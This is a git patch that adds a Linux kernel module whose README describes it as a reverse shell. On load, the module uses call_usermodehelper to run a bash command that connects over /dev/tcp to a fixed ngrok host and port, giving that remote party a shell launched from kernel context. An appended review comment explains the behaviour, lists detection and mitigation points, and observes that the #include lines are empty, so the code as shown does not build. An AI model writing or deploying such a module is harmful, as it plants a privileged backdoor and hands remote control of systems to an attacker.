From 868d08b1ca41e11d9c8a3ca00e407c100b2e8226 Mon Sep 17 00:00:00 2001
From: Vadim
Date: Thu, 4 Jul 2024 01:34:14 +0400
Subject: [PATCH] upload source code
---
Makefile | 7 +++++++
README.md | 4 ++--
reverse-shell.c | 29 +++++++++++++++++++++++++++++
3 files changed, 38 insertions(+), 2 deletions(-)
create mode 100644 Makefile
create mode 100644 reverse-shell.c
diff --git a/Makefile b/Makefile
new file mode 100644
index 0000000..ed81052
--- /dev/null
+++ b/Makefile
@@ -0,0 +1,7 @@
+obj-m += reverse-shell.o
+
+all:
+ make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
+
+clean:
+ make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
diff --git a/README.md b/README.md
index 48ee944..b359eed 100644
--- a/README.md
+++ b/README.md
@@ -1,3 +1,3 @@
-# lkm_reverse_shell
+# LKM Reverse Shell
 
-A Linux kernel module that performs a reverse shell
\ No newline at end of file
+A Linux kernel module that performs a reverse shell
diff --git a/reverse-shell.c b/reverse-shell.c
new file mode 100644
index 0000000..e2766b4
--- /dev/null
+++ b/reverse-shell.c
@@ -0,0 +1,29 @@
+#include
+#include
+
+MODULE_LICENSE("GPL");
+MODULE_AUTHOR("Hacker");
+MODULE_DESCRIPTION("Reverse Shell");
+MODULE_VERSION("1.0");
+
+// для составления нужной нагрузки можно воспользоваться веб-ресурсом https://www.revshells.com
+char* argv[] = {
+ "/bin/bash",
+ "-c",
+ "bash -i >& /dev/tcp/0.tcp.eu.ngrok.io/12110 0>&1",
+ NULL
+};
+
+static char* envp[] = { "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL };
+
+// функция call_usermodehelper используется для того, чтобы создать процесс в пространстве пользователя из пространства ядра
+static int __init reverse_shell_init(void) {
+ return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
+}
+
+static void __exit reverse_shell_exit(void) {
+ printk(KERN_INFO "Exiting\n");
+}
+
+module_init(reverse_shell_init);
+module_exit(reverse_shell_exit);
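Review bot: Nothing in reverse-shell.c states what loading the module does, and its only two comments are in Russian: `reverse_shell_init` passes the fixed `argv` to `call_usermodehelper`, so a `/bin/bash -c` process with a hard-coded outbound `/dev/tcp` redirection is started from kernel context as soon as the module is inserted. A header comment in English should say so, e.g. `/* On load: starts /bin/bash in user space via call_usermodehelper(); the command in argv[2] connects out to a fixed host and port. */`. For anyone analysing or detecting this, the observable sequence is a module-load event (`init_module`/`finit_module`) followed by a shell parented by a kernel thread rather than a user session. Loading is refused where module signature enforcement (`module.sig_enforce=1`) or `kernel.modules_disabled=1` is in effect, and `CONFIG_STATIC_USERMODEHELPER` restricts which binary a usermode-helper call can execute. Both `#include` lines have lost their header names in this copy, so the listing does not build as shown.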